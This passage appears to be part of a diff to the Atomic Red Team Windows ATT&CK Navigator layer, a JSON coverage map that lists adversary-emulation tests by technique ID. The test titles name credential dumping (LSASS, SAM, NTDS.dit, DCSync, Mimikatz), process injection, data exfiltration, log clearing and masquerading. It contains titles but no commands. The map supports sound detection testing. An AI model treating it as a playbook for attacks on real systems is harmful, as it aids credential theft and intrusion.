Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 